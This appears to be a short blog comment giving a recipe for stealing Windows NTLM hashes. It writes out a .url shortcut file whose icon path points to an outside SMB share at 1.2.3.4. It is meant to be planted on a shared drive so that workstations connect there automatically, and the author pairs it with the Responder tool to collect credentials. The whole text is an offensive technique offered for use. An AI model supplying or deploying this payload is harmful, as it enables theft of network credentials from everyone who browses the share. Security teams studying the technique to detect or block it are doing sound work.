generate a file toto.url
with the following content
[InternetShortcut]
URL=https://www.google.com/
IconIndex=0
IconFile=\\1.2.3.4\leak\leak.ico
Place the toto.url file on a sharedrive.
Many workstations will try to get the ico file of the toto.url file, there will try to connect to 1.2.3.4 share leak.
combined with Responder tool, you will get a lot of the NTLM hashes without much effort.
Many more example here : https://www.securify.nl/blog/SFY20180501/living-off-the-land_-stealing-netntlm-hashes.html
0
Recent Comments